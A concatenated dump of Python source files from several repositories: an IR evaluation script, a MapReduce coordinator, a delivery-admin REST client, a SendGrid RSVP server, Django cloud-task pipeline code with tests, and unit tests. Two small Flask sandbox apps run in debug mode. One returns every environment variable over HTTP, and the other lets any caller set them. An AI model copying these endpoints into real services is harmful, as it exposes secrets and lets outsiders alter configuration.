d = disp.plot(ax=axes)
axes.set_ylim([-0.01, 1.01])
# plt.scatter(recalls, precisions, marker=markers[i])
i += 1
# Need to set scatter plots to no_legend
# insert_legends = []
# for legend in legends:
# insert_legends.append(legend)
# insert_legends.append('_nolegend_')
plt.gca().legend((legends))
plt.tight_layout()
plt.savefig("precision_recall", bbox_inches='tight')
plt.show()
def calc_metrics(data):
print("Average Precision: {:.2%}".format(ap(data["docs"])))
print("P@10: {:.2%}".format(p10(data["docs"])))
print("Recall: {:.2%}".format(rec(data["docs"])))
print("Fβ: {:.2%}".format(fB(data["docs"], 0.5)))
""" Checks if a document has an unset relevance score"""
def check_doc(docs, label):
def has_relevancy(doc):
return doc["relevant"] == "true" or doc["relevant"] == "false"
for i in range(len(docs)):
if not has_relevancy(docs[i]):
print("File " + label + ", document no " +
str(i) + " has invalid relevant type")
exit(1)
def usage():
print("Usage: ./evaluate.py <qrel1 label1 qrel2 label2 ...>")
exit(-1)
if len(sys.argv) == 1:
usage()
jsons = []
labels = []
for i in range(1, len(sys.argv[1:]), 2):
# Load args
file = sys.argv[i]
label = sys.argv[i + 1]
# Load json
f = open(file)
data = json.load(f)
# Check doc validity
check_doc(data["docs"], file)
jsons.append(data)
id = alphabet[i // 2]
labels.append(str("System " + id + " - " + label))
recalls_precisions = []
for data in jsons:
calc_metrics(data)
recalls_precisions.append(get_precision_recalls(data["docs"]))
plot_recall_precision(recalls_precisions, labels)
``` |
{
"source": "joaocps/map-reduce",
"score": 3
} |
#### File: joaocps/map-reduce/coordinator.py
```python
import csv
import json
import logging
import argparse
import socket
import threading
from queue import Queue
import locale
import time
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M:%S')
logger = logging.getLogger('coordinator')
class Coordinator(object):
def __init__(self):
# -----------
# Coordinator Socket
# -----------
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.logger = logging.getLogger('Coordinator')
# -----------
# Datastore of initial blobs
# -----------
self.datastore = []
self.datastore_q = Queue()
# -----------
# Queue of Map responses from worker
# -----------
self.map_responses = Queue()
# -----------
# Queue of Reduce responses from worker
# -----------
self.reduce_responses = Queue()
# -----------
        # Unused variables, but possibly useful later
# -----------
self.ready_workers = []
self.map_jobs = True
def jobs_to_do(self, clientsocket):
# If ready_workers > 0 start!
map_req = json.dumps(dict(task="map_request", blob=self.datastore_q.get()))
size1 = len(map_req)
clientsocket.sendall((str(size1).zfill(8) + map_req).encode("utf-8"))
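        # Wire protocol: an 8-byte, zero-padded ASCII length prefix followed by the JSON payload.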
while True:
bytes_size = clientsocket.recv(8).decode()
xyz = int(bytes_size)
new_msg = clientsocket.recv(xyz).decode("utf-8")
if new_msg:
msg = json.loads(new_msg)
# print(new_msg)
if msg["task"] == "map_reply":
if not self.datastore_q.empty():
self.map_responses.put(msg["value"])
map_req = json.dumps(dict(task="map_request", blob=self.datastore_q.get()))
size = len(map_req)
clientsocket.sendall((str(size).zfill(8) + map_req).encode("utf-8"))
else:
self.map_responses.put(msg["value"])
# print("toda")
# print(list(self.map_responses.queue))
reduce_req = json.dumps(dict(task="reduce_request", value=(self.map_responses.get(),
self.map_responses.get())))
size = len(reduce_req)
clientsocket.sendall((str(size).zfill(8) + reduce_req).encode("utf-8"))
elif msg["task"] == "reduce_reply":
self.reduce_responses.put(msg["value"])
if not self.map_responses.empty():
if self.map_responses.qsize() == 1:
reduce_req = json.dumps(dict(task="reduce_request", value=(self.map_responses.get(),
self.reduce_responses.get())))
size = len(reduce_req)
clientsocket.send((str(size).zfill(8) + reduce_req).encode("utf-8"))
elif self.map_responses.qsize() > 1:
reduce_req = json.dumps(dict(task="reduce_request", value=(self.map_responses.get(),
self.map_responses.get())))
size = len(reduce_req)
clientsocket.send((str(size).zfill(8) + reduce_req).encode("utf-8"))
else:
if self.reduce_responses.qsize() > 1:
reduce_req = json.dumps(dict(task="reduce_request", value=(self.reduce_responses.get(),
self.reduce_responses.get())))
print(reduce_req)
size = len(reduce_req)
clientsocket.send((str(size).zfill(8) + reduce_req).encode("utf-8"))
elif self.reduce_responses.qsize() == 1:
print("Job Completed, Waiting for workers to collect words and write file, please wait!")
time.sleep(10)
locale.setlocale(locale.LC_COLLATE, "pt_PT.UTF-8")
hist = self.reduce_responses.get()
palavras = []
final = []
for p in hist:
palavras.append(p[0])
f = sorted(palavras, key=locale.strxfrm)
# print(f)
for t in f:
for i in hist:
if i[0] == t:
final.append(i)
# store final histogram into a CSV file
with args.out as f:
csv_writer = csv.writer(f, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
for w, c in final:
csv_writer.writerow([w, c])
print("DONE, Output file created!")
def main(self, args):
with args.file as f:
while True:
blob = f.read(args.blob_size)
if not blob:
break
                # This loop avoids breaking a word in half
while not str.isspace(blob[-1]):
ch = f.read(1)
if not ch:
break
blob += ch
logger.debug('Blob: %s', blob)
self.datastore.append(blob)
self.datastore_q.put(blob)
n_workers = input("Number of workers to perform the job? ")
print("Waiting for Workers...")
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(("localhost", args.port))
self.socket.listen(5)
while len(self.ready_workers) < int(n_workers):
clientsocket, address = self.socket.accept()
json_msg = clientsocket.recv(1024).decode("utf-8")
if json_msg:
msg = json.loads(json_msg)
if msg["task"] == "register":
self.ready_workers.append(clientsocket)
print("Worker Connected")
for i in self.ready_workers:
process_messages = threading.Thread(target=self.jobs_to_do, args=(i,))
process_messages.start()
# process_messages = threading.Thread(target=self.jobs_to_do, args=(clientsocket,))
# process_messages.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='MapReduce Coordinator')
parser.add_argument('-p', dest='port', type=int, help='coordinator port', default=8765)
parser.add_argument('-f', dest='file', type=argparse.FileType('r', encoding='UTF-8'), help='input file path')
parser.add_argument('-o', dest='out', type=argparse.FileType('w', encoding='UTF-8'), help='output file path', default='output.csv')
parser.add_argument('-b', dest='blob_size', type=int, help='blob size', default=1024)
args = parser.parse_args()
Coordinator().main(args)
``` |
{
"source": "joaocps/pyipma",
"score": 3
} |
#### File: joaocps/pyipma/example.py
```python
import asyncio
import aiohttp
from pyipma.api import IPMA_API
from pyipma.location import Location
async def main():
async with aiohttp.ClientSession() as session:
api = IPMA_API(session)
location = await Location.get(api, 40.6517, -8.6573, sea_stations=True)
print("Forecast for {}".format(location.name))
print("Nearest station is {}".format(location.station))
print("Nearest sea station is {}".format(location.sea_station_name))
obs = await location.observation(api)
print("Current weather is {}".format(obs))
forecasts = await location.forecast(api)
print("Forecast for tomorrow {}".format(forecasts[0]))
sea_forecast = await location.sea_forecast(api)
print("Sea forecast for today {}".format(sea_forecast))
asyncio.get_event_loop().run_until_complete(main())
``` |
{
"source": "joaocps/tqs-clouddeliveries",
"score": 3
} |
#### File: joaocps/tqs-clouddeliveries/client.py
```python
import getpass
from External_service import CloudDeliveries
from pprint import pprint
import os
def print_loginmenu():
email = input("Username : ")
password = getpass.getpass("Enter Password : ")
return email, password
def print_menu():
print("1 - Drivers")
print("2 - Type Veichle")
print("3 - Veichle")
print("4 - Order")
option = input("option : ")
return option
def print_submenu():
print("1 - Get")
print("2 - Add")
print("3 - update")
print("4 - Delete")
option = input("option : ")
return option
def print_submenu_order():
print("1 - Get User Orders")
print("2 - Update State")
option = input("option : ")
return option
deliveries = CloudDeliveries()
email, password = print_loginmenu()
dic = deliveries.authenticate(email, password)
code, token = dic['status'], dic['token'].decode()
while code != 200:
email, password = print_loginmenu()
dic = deliveries.authenticate(email, password)
code, token = dic['status'], dic['token'].decode()
#print(token)
#os.system("cls")
option = "0"
while option != "10":
option = print_menu()
os.system("cls")
if option == "1": # Drivers
sub_option = print_submenu()
if sub_option == "1":
drivers = deliveries.getDrivers()
print([driver.toJSON() for driver in drivers])
elif sub_option == "2":
contact = input("introduza o contacto : ")
deliveries.addDriver(contact)
elif sub_option == "3":
idd = input("Introduza o id : ")
contact = input("introduza o contacto : ")
deliveries.updateDriver(idd, contact)
else:
idd = input("Introduza o id : ")
deliveries.deleteDriver(idd)
elif option == "2":
sub_option = print_submenu()
if sub_option == "1":
veichle_types = deliveries.getVeichleTypes()
print([v.toJSON() for v in veichle_types])
elif sub_option == "2":
name = input("introduza o nome : ")
capacidade = input("Introduza a capacidade : ")
deliveries.addVeichleType(name, capacidade)
elif sub_option == "3":
idd = input("Introduza o id : ")
name = input("introduza o nome : ")
capacidade = input("Introduza a capacidade : ")
deliveries.updateVeichleType(idd, name, capacidade)
else:
idd = input("Introduza o id : ")
deliveries.deleteVeichleType(idd)
elif option == '3':
sub_option = print_submenu()
if sub_option == "1":
veichles = deliveries.getVeichles()
print([v.toJSON() for v in veichles])
elif sub_option == "2":
id_type = input("introduza o id do tipo de veículo : ")
id_driver = input("Introduza o id do Driver : ")
deliveries.addVeichle(id_type, id_driver)
elif sub_option == "3":
idd = input("Introduza o id : ")
id_type = input("introduza o id do tipo de veículo : ")
id_driver = input("Introduza o id do Driver : ")
deliveries.updateVeichle(idd, id_type, id_driver)
else:
idd = input("Introduza o id : ")
deliveries.deleteVeichle(idd)
elif option == '4':
sub_option = print_submenu_order()
if sub_option == '1':
email = input("Introduza o email : ")
orders = deliveries.getOrders(email)
print(orders)
elif sub_option == '2':
idd = input("introduza o id da order : ")
state = input("Introduza o state da order (progress, deliver, finish) : ")
while not state in ['progress', 'deliver', 'finish']:
state = input("Introduza o state da order (progress, deliver, finish) : ")
deliveries.updateOrderState(idd, state)
print()
deliveries.logout()
```
#### File: joaocps/tqs-clouddeliveries/External_service.py
```python
import requests
import json
def decorator(method):
if method.__name__ in [ '__init__', 'getDriver', 'getDrivers', 'getVeichleType', 'getVeichleTypes', 'getVeichle','getVeichles', 'authenticate', 'logout', 'getOrders']:
return method
def func(self, *args, **kwargs):
result = method(self, *args, **kwargs)
if result.status_code != 200:
print("Argumentos Errados")
else:
print("Ordem efetuada com sucesso")
return func
def for_all_methods(decorator):
def decorate(cls):
        for attr in cls.__dict__: # there's probably a better way to do this
if callable(getattr(cls, attr)):
setattr(cls, attr, decorator(getattr(cls, attr)))
return cls
return decorate
@for_all_methods(decorator)
class CloudDeliveries():
def __init__(self, base_url = 'http://192.168.160.6:8080/'):
self.base_url = base_url
def authenticate(self, email, password):
url = self.base_url + "user/admin/login/"
r = requests.post(url, json = {'email' : email, 'password' : password})
if r.status_code == 200:
return {'status' : r.status_code, 'token' : r.content}
print("Argumentos inválidos")
return {'status' : r.status_code, 'token' : "-1".encode()}
def logout(self, email):
url = self.base_url + "user/admin/logout/" + email
r = requests.delete(url)
if r.status_code == 200:
return r.content
print("Argumentos inválidos")
def addDriver(self, contact):
url = self.base_url + "driver/"
r = requests.post(url, json = {'contact' : contact})
return r
def deleteDriver(self, idd):
url = self.base_url + 'driver/' + str(idd) + '/';
r = requests.delete(url)
return r
def updateDriver(self, idd, contact):
url = self.base_url + 'driver/' + str(idd) + '/';
return requests.put(url, json = {'contact' : contact})
def getDriver(self, idd):
url = self.base_url + 'driver/' + str(idd) + '/';
return Driver(requests.get(url).content.decode())
def getDrivers(self):
url = self.base_url + 'driver/'
r = requests.get(url).json()
return [Driver(json.dumps(a)) for a in r]
def addVeichleType(self, name, capacity):
url = self.base_url + "typeveichle/"
r = requests.post(url, json = {'name' : name, 'capacity' : capacity})
return r
def deleteVeichleType(self, idd):
url = self.base_url + 'typeveichle/' + str(idd) + '/';
r = requests.delete(url)
return r
def updateVeichleType(self, idd, name, capacity):
url = self.base_url + 'typeveichle/' + str(idd) + '/';
r = requests.post(url, json = {'name' : name, 'capacity' : capacity})
return r
def getVeichleType(self, idd):
url = self.base_url + 'typeveichle/' + str(idd) + '/';
        r = requests.get(url)
        return VeichleType(r.content.decode())
def getVeichleTypes(self):
url = self.base_url + 'typeveichle/'
r = requests.get(url).json()
return [VeichleType(json.dumps(a)) for a in r]
def addVeichle(self, id_type, id_driver):
url = self.base_url + "veichle/"
r = requests.post(url, json = {'id_veichle_type' : id_type, 'id_driver' : id_driver})
return r
def deleteVeichle(self, idd):
url = self.base_url + 'veichle/' + str(idd) + '/';
r = requests.delete(url)
return r
def updateVeichle(self, idd, id_type, id_driver):
url = self.base_url + 'veichle/' + str(idd) + '/';
return requests.put(url, json = {'id_veichle_type' : id_type, 'id_driver' : id_driver})
def getVeichle(self, idd):
url = self.base_url + 'veichle/' + str(idd) + '/';
return Veichle(requests.get(url).content.decode())
def getVeichles(self):
url = self.base_url + 'veichle/'
r = requests.get(url).json()
return [Veichle(json.dumps(a)) for a in r]
def getOrders(self, email):
url = self.base_url + 'order/user/' + email
r = requests.get(url)
content = r.content.decode()
return content
def updateOrderState(self, idd, state):
url = self.base_url + 'order/state/' + idd + '/' + state + '/'
r = requests.put(url)
return r
class Driver:
def __init__(self, j):
self.__dict__ = json.loads(j)
def toJSON(self):
return "id : " + str(self.id) + ", contact : " + str(self.contact)
class VeichleType:
def __init__(self, j):
self.__dict__ = json.loads(j)
def toJSON(self):
return json.dumps(self, default = lambda o : o.__dict__, sort_keys = True, indent = 4)
class Veichle:
def __init__(self, j):
self.__dict__ = json.loads(j)
def toJSON(self):
return json.dumps(self, default = lambda o : o.__dict__, sort_keys = True, indent = 4)
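# --- Editor's usage sketch (not part of the original client) ---
# Minimal example of how the wrapped client above could be driven; the
# credentials, contact number and base_url are placeholders, and a reachable
# REST backend is assumed.
if __name__ == '__main__':
    client = CloudDeliveries(base_url='http://192.168.160.6:8080/')
    session = client.authenticate('<EMAIL>', '<PASSWORD>')
    if session['status'] == 200:
        client.addDriver(contact='912345678')   # wrapped: prints the request outcome
        for driver in client.getDrivers():      # excluded from the decorator
            print(driver.toJSON())
        client.logout('<EMAIL>')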
``` |
{
"source": "joaodaher/brunaefauzer",
"score": 3
} |
#### File: joaodaher/brunaefauzer/server.py
```python
import http.server
import json
from urllib import parse
import sendgrid
import os
from sendgrid.helpers.mail import *
FROM_EMAIL = os.environ.get('FROM_EMAIL', '<EMAIL>')
class Handler(http.server.SimpleHTTPRequestHandler):
def do_POST(self):
self.data_string = self.rfile.read(int(self.headers['Content-Length']))
data = parse.parse_qs(self.data_string.decode())
email = data['inputemail'][0]
amount = int(data['inputevents[]'][0]) - 1
message = data['inputmessage'][0]
name = data['inputname'][0]
response = self.send_rsvp(email=email, name=name, amount=amount, message=message)
if response.status_code == 202:
self.send_confirmation(email=email, name=name, amount=amount)
r = {
'type': 'success',
'text': "Seu RSVP foi enviado. Muito obrigado!",
}
else:
r = {
'type': 'error',
'text': "Tente novamente mais tarde. :(",
}
self.send_response(response.status_code)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(r).encode())
def send_rsvp(self, email, name, amount, message):
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = Email(email)
subject = f"[RSVP] {name} + {amount}"
to_email = Email(FROM_EMAIL)
content = Content("text/plain", f"{message}")
mail = Mail(from_email, subject, to_email, content)
return sg.client.mail.send.post(request_body=mail.get())
def send_confirmation(self, email, name, amount):
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = Email(FROM_EMAIL)
subject = f"Casamento Bruna & Fauzer"
to_email = Email(email)
extra = ""
plural = 's' if amount > 1 else ''
if amount:
extra = f"e mais {amount} pessoa{plural} "
message = f"""
{name},
Sua presença está confirmada no nosso casamento!
Aguardamos você {extra}no dia 17/11/2018.
Obrigado!
<NAME>
www.brunaefauzer.com.br
"""
content = Content("text/plain", f"{message}")
mail = Mail(from_email, subject, to_email, content)
return sg.client.mail.send.post(request_body=mail.get())
s = http.server.HTTPServer(('', int(os.environ.get('PORT', '8080'))), Handler)
s.serve_forever()
``` |
{
"source": "joaodaher/django-cloud-tasks",
"score": 2
} |
#### File: django-cloud-tasks/django_cloud_tasks/models.py
```python
from datetime import datetime
from typing import Optional, Dict
from django.db import transaction, models
from django.apps import apps
from django_cloud_tasks import tasks, serializers
class Pipeline(models.Model):
name = models.CharField(max_length=100)
def start(self):
routines = self.routines.filter(
models.Q(dependent_routines__id__isnull=True) & models.Q(status=Routine.Statuses.PENDING)
)
for routine in routines:
routine.enqueue()
def revert(self):
        # TODO: Actually we don't know what to do when a routine with RUNNING status is triggered
# to revert. We trust that it will not be a big deal for now. But would be great to support that soon
routines = self.routines.filter(
models.Q(next_routines__id__isnull=True) & ~models.Q(status=Routine.Statuses.REVERTED)
)
for routine in routines:
routine.revert()
def add_routine(self, routine: Dict) -> "Routine":
return self.routines.create(**routine)
class Routine(models.Model):
class Statuses(models.TextChoices):
PENDING = ("pending", "Pending")
SCHEDULED = ("scheduled", "Scheduled")
RUNNING = ("running", "Running")
COMPLETED = ("completed", "Completed")
FAILED = ("failed", "Failed")
REVERTING = ("reverting", "Reverting")
REVERTED = ("reverted", "Reverted")
# TODO: We have a signal to check if task_name defined does exists.
# We can do it with Django Field Validators
task_name = models.CharField(max_length=100)
pipeline = models.ForeignKey(
to="django_cloud_tasks.Pipeline",
related_name="routines",
on_delete=models.PROTECT,
)
body = models.JSONField(
default=dict,
encoder=serializers.JSONEncoder,
)
attempt_count = models.PositiveIntegerField(default=0)
max_retries = models.PositiveIntegerField(null=True)
output = models.JSONField(
null=True,
blank=True,
encoder=serializers.JSONEncoder,
)
starts_at = models.DateTimeField(null=True, blank=True)
ends_at = models.DateTimeField(null=True, blank=True)
status = models.CharField(
max_length=20,
choices=Statuses.choices,
default=Statuses.PENDING,
)
created_at = models.DateTimeField(
auto_now_add=True,
)
updated_at = models.DateTimeField(
auto_now=True,
)
next_routines = models.ManyToManyField(
to="Routine",
through="RoutineVertex",
through_fields=("routine", "next_routine"),
related_name="dependent_routines",
)
def fail(self, output: Dict):
self.output = output
self.status = self.Statuses.FAILED
self.ends_at = datetime.now()
self.save()
def complete(self, output: Dict):
self.output = output
self.status = self.Statuses.COMPLETED
self.ends_at = datetime.now()
self.save()
def enqueue(self):
with transaction.atomic():
self.status = self.Statuses.SCHEDULED
self.starts_at = datetime.now()
self.save()
def revert(self):
with transaction.atomic():
if self.status not in [self.Statuses.REVERTED, self.Statuses.REVERTING]:
self.status = self.Statuses.REVERTING
self.save()
def add_next(self, routine: Dict) -> "Routine":
routine["pipeline_id"] = self.pipeline_id
return self.next_routines.create(**routine)
@property
def task(self) -> Optional[tasks.Task]:
app = apps.get_app_config("django_cloud_tasks")
return app.get_task(name=self.task_name)
class RoutineVertex(models.Model):
next_routine = models.ForeignKey(
to="django_cloud_tasks.Routine",
on_delete=models.PROTECT,
related_name="required_routine_vertices",
)
routine = models.ForeignKey(
to="django_cloud_tasks.Routine",
related_name="next_routine_vertices",
on_delete=models.PROTECT,
)
class Meta:
constraints = [
models.UniqueConstraint(name="unique_routine_next_routine", fields=("next_routine", "routine")),
]
__all__ = (
"Routine",
"RoutineVertex",
"Pipeline",
)
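# --- Editor's usage sketch (not part of the original module) ---
# Illustrates how a pipeline of chained routines might be assembled with the
# models above; "SayHelloTask" is a placeholder task name and the snippet
# assumes migrations have been applied and the task is registered.
def build_example_pipeline() -> Pipeline:
    pipeline = Pipeline.objects.create(name="example")
    first = pipeline.add_routine({"task_name": "SayHelloTask", "body": {"spell": "Lumos"}})
    # add_next() creates the RoutineVertex linking the two routines
    first.add_next({"task_name": "SayHelloTask", "body": {"spell": "Nox"}})
    # start() enqueues only routines with no pending dependencies
    pipeline.start()
    return pipeline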
```
#### File: sample_project/sample_app/apps.py
```python
from django.apps import AppConfig
class SampleAppConfig(AppConfig):
name = "sample_app"
def ready(self):
from sample_project.sample_app import tasks # pylint: disable=import-outside-toplevel,unused-import
```
#### File: sample_app/tests/tests_tasks.py
```python
from contextlib import ExitStack
import json
from unittest.mock import patch
from django.apps import apps
from django.test import SimpleTestCase, TestCase
from gcp_pilot.exceptions import DeletedRecently
from gcp_pilot.mocker import patch_auth
from django_cloud_tasks import exceptions
from django_cloud_tasks.tests import factories, tests_base
from django_cloud_tasks.tasks import PublisherTask, PipelineRoutineTask, PipelineRoutineRevertTask
from sample_project.sample_app import tasks
from sample_project.sample_app.tests.tests_base_tasks import patch_cache_lock
class TasksTest(SimpleTestCase):
def patch_push(self, **kwargs):
return patch("gcp_pilot.tasks.CloudTasks.push", **kwargs)
def test_registered_tasks(self):
app_config = apps.get_app_config("django_cloud_tasks")
expected_tasks = {
"PublisherTask",
"CalculatePriceTask",
"FailMiserablyTask",
"OneBigDedicatedTask",
"PipelineRoutineTask",
"SayHelloTask",
"SayHelloWithParamsTask",
"DummyRoutineTask",
"RoutineLockTaskMixin",
"PipelineRoutineRevertTask",
}
self.assertEqual(expected_tasks, set(app_config.on_demand_tasks))
expected_tasks = {"SaySomethingTask"}
self.assertEqual(expected_tasks, set(app_config.periodic_tasks))
expected_tasks = {"PleaseNotifyMeTask"}
self.assertEqual(expected_tasks, set(app_config.subscriber_tasks))
def test_get_task(self):
app_config = apps.get_app_config("django_cloud_tasks")
self.assertEqual(PublisherTask, app_config.get_task(name="PublisherTask"))
def test_get_task_not_found(self):
app_config = apps.get_app_config("django_cloud_tasks")
with self.assertRaises(exceptions.TaskNotFound):
app_config.get_task(name="PotatoTask")
def test_task_async(self):
with self.patch_push() as push:
with patch_auth():
tasks.CalculatePriceTask().delay(price=30, quantity=4, discount=0.2)
expected_call = dict(
queue_name="tasks",
url="http://localhost:8080/tasks/CalculatePriceTask",
payload=json.dumps({"price": 30, "quantity": 4, "discount": 0.2}),
)
push.assert_called_once_with(**expected_call)
def test_task_async_only_once(self):
with self.patch_push() as push:
with patch_auth():
tasks.FailMiserablyTask().delay(magic_number=666)
expected_call = dict(
task_name="FailMiserablyTask",
queue_name="tasks",
url="http://localhost:8080/tasks/FailMiserablyTask",
payload=json.dumps({"magic_number": 666}),
unique=False,
)
push.assert_called_once_with(**expected_call)
def test_task_async_reused_queue(self):
effects = [DeletedRecently("Queue tasks"), None]
with self.patch_push(side_effect=effects) as push:
with patch_auth():
tasks.CalculatePriceTask().delay(price=30, quantity=4, discount=0.2)
expected_call = dict(
queue_name="tasks",
url="http://localhost:8080/tasks/CalculatePriceTask",
payload=json.dumps({"price": 30, "quantity": 4, "discount": 0.2}),
)
        expected_backup_call = expected_call.copy()
        expected_backup_call["queue_name"] += "--temp"
self.assertEqual(2, push.call_count)
push.assert_any_call(**expected_call)
push.assert_called_with(**expected_backup_call)
def test_task_eager(self):
with self.settings(EAGER_TASKS=True):
with patch_auth():
response = tasks.CalculatePriceTask().delay(price=30, quantity=4, discount=0.2)
self.assertGreater(response, 0)
class PipelineRoutineRevertTaskTest(TestCase):
_mock_lock = None
def setUp(self):
super().setUp()
patched_settings = self.settings(EAGER_TASKS=True)
patched_settings.enable()
self.addCleanup(patched_settings.disable)
stack = ExitStack()
self.mock_lock = stack.enter_context(patch_cache_lock())
def test_process_revert_and_update_routine_to_reverted(self):
routine = factories.RoutineWithoutSignalFactory(
status="reverting",
task_name="SayHelloTask",
output={"spell": "Obliviate"},
)
with patch("sample_project.sample_app.tasks.SayHelloTask.revert") as revert:
PipelineRoutineRevertTask().delay(routine_id=routine.pk)
revert.assert_called_once_with(data=routine.output)
routine.refresh_from_db()
self.assertEqual(routine.status, "reverted")
class PipelineRoutineTaskTest(TestCase):
_mock_lock = None
def setUp(self):
super().setUp()
patched_settings = self.settings(EAGER_TASKS=True)
patched_settings.enable()
self.addCleanup(patched_settings.disable)
stack = ExitStack()
self.mock_lock = stack.enter_context(patch_cache_lock())
def assert_routine_lock(self, routine_id: int):
self.mock_lock.assert_called_with(
key=f"lock-PipelineRoutineTask-{routine_id}",
timeout=60,
blocking_timeout=5,
)
def tests_dont_process_completed_routine(self):
routine = factories.RoutineWithoutSignalFactory(
status="completed",
task_name="SayHelloTask",
)
with self.assertLogs(level="INFO") as context:
PipelineRoutineTask().delay(routine_id=routine.pk)
self.assert_routine_lock(routine_id=routine.pk)
self.assertEqual(context.output, [f"INFO:root:Routine #{routine.pk} is already completed"])
def tests_start_pipeline_revert_flow_if_exceeded_retries(self):
routine = factories.RoutineWithoutSignalFactory(
status="running",
task_name="SayHelloTask",
max_retries=1,
attempt_count=2,
)
with patch("django_cloud_tasks.models.Pipeline.revert") as revert:
with self.assertLogs(level="INFO") as context:
PipelineRoutineTask().delay(routine_id=routine.pk)
self.assertEqual(
context.output,
[
f"INFO:root:Routine #{routine.id} has exhausted retries and is being reverted",
],
)
self.assert_routine_lock(routine_id=routine.pk)
revert.assert_called_once()
def tests_store_task_output_into_routine(self):
routine = factories.RoutineWithoutSignalFactory(
status="running",
task_name="SayHelloTask",
body={"attributes": [1, 2, 3]},
attempt_count=1,
)
with self.assertLogs(level="INFO") as context:
PipelineRoutineTask().run(routine_id=routine.pk)
self.assert_routine_lock(routine_id=routine.pk)
routine.refresh_from_db()
self.assertEqual(
context.output,
[
f"INFO:root:Routine #{routine.id} is running",
f"INFO:root:Routine #{routine.id} just completed",
],
)
self.assertEqual("completed", routine.status)
self.assertEqual(2, routine.attempt_count)
def tests_fail_routine_if_task_has_failed(self):
routine = factories.RoutineWithoutSignalFactory(
status="running",
task_name="SayHelloTask",
body={"attributes": [1, 2, 3]},
attempt_count=1,
)
with self.assertLogs(level="INFO") as context:
with patch("sample_project.sample_app.tasks.SayHelloTask.run", side_effect=Exception("any error")):
with patch("django_cloud_tasks.models.Routine.enqueue") as enqueue:
PipelineRoutineTask().run(routine_id=routine.pk)
self.assert_routine_lock(routine_id=routine.pk)
routine.refresh_from_db()
self.assertEqual(
context.output,
[
f"INFO:root:Routine #{routine.id} is running",
f"INFO:root:Routine #{routine.id} has failed",
f"INFO:root:Routine #{routine.id} has been enqueued for retry",
],
)
self.assertEqual("failed", routine.status)
enqueue.assert_called_once()
self.assertEqual(2, routine.attempt_count)
class SayHelloTaskTest(TestCase, tests_base.RoutineTaskTestMixin):
@property
def task(self):
return tasks.SayHelloTask
class SayHelloWithParamsTaskTest(TestCase, tests_base.RoutineTaskTestMixin):
@property
def task(self):
return tasks.SayHelloWithParamsTask
@property
def task_run_params(self):
return {"spell": "Obliviate"}
``` |
{
"source": "joaodartora/devops-sandbox",
"score": 3
} |
#### File: python/http-create-env-var/create_env_var.py
```python
import os
from flask import Flask
app = Flask(__name__)
@app.route("/env/<name>/<var>")
def set_env_var(name, var):
os.environ[name] = str(var)
return os.environ.get(name)
if __name__=='__main__':
app.run(debug=True, port=8080)
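# --- Editor's note (usage sketch, not in the original file) ---
# With the app running locally, the route can be exercised from another shell;
# the variable name and value below are arbitrary examples.
#   import requests
#   print(requests.get('http://localhost:8080/env/GREETING/hello').text)  # -> 'hello'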
```
#### File: python/http-env-vars/http_env_vars.py
```python
import os
from flask import Flask
app = Flask(__name__)
@app.route("/conf/env")
def list_env_vars():
return str(os.environ)
if __name__=='__main__':
app.run(debug=True, port=8080)
``` |
{
"source": "joaodartora/random-greetings",
"score": 3
} |
#### File: joaodartora/random-greetings/random_greetings_test.py
```python
import unittest
import random_greetings
class RandomGreetings(unittest.TestCase):
# abrir_csv
def test_abrir_csv_com_sucesso_validando_numero_linhas(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_correta.csv")
numero_linhas = sum(1 for linha in arquivo_csv)
self.assertEqual(numero_linhas, 10345)
def test_abrir_csv_sem_linhas_deve_retornar_zero_linhas(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_vazia.csv")
numero_linhas = sum(1 for linha in arquivo_csv)
self.assertEqual(numero_linhas, 0)
# buscar_termos_validos
def test_buscar_termos_validos_com_sucesso_deve_retornar_numero_correto_de_elementos(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_correta.csv")
lista_termos = random_greetings.buscar_termos_validos(arquivo_csv)
self.assertEqual(len(lista_termos), 9684)
def test_buscar_termos_validos_com_apenas_2_colunas_arquivo_deve_retornar_lista_vazia(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_com_2_colunas.csv")
lista_termos = random_greetings.buscar_termos_validos(arquivo_csv)
self.assertEqual(len(lista_termos), 0)
def test_buscar_termos_validos_sem_elementos_validos_deve_retornar_lista_vazia(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_apenas_familias.csv")
lista_termos = random_greetings.buscar_termos_validos(arquivo_csv)
self.assertEqual(len(lista_termos), 0)
# definir_saudacao
def test_definir_saudacao_madrugada_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(3), "Boa madrugada")
def test_definir_saudacao_dia_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(7), "Bom dia")
def test_definir_saudacao_tarde_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(13), "Boa tarde")
def test_definir_saudacao_noite_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(19), "Boa noite")
# montar_response
def test_montar_response_com_sucesso(self):
cumprimento = "Boa noite, meu Esmaltador de metais não-preciosos"
self.assertEqual(random_greetings.montar_response(cumprimento).decode(), '{"cumprimento": "Boa noite, meu Esmaltador de metais não-preciosos"}')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joaodath/kan",
"score": 3
} |
#### File: kan/kan/structures.py
```python
import json
from abc import abstractmethod, ABCMeta, abstractproperty
from contextlib import contextmanager
try:
from urllib.request import urlopen, Request
from urllib.parse import urlencode
from urllib.error import HTTPError
except ImportError:
from urllib2 import urlopen, Request, HTTPError
from urllib import urlencode
__all__ = [
'AbstractBaseAPIClient',
'GoogleBooksAPIClient',
]
class AbstractBaseAPIClient:
"""
AbstractBaseAPIClient that specifies the abstractmethods
necessary to propertly be handled.
The AbstractBaseClass defines a minimal set of methods that establish
the characteristic behavior for the APIClient.
Code that discriminates based on Abstract methods can trust that
those methods will always be present.
"""
__metaclass__ = ABCMeta
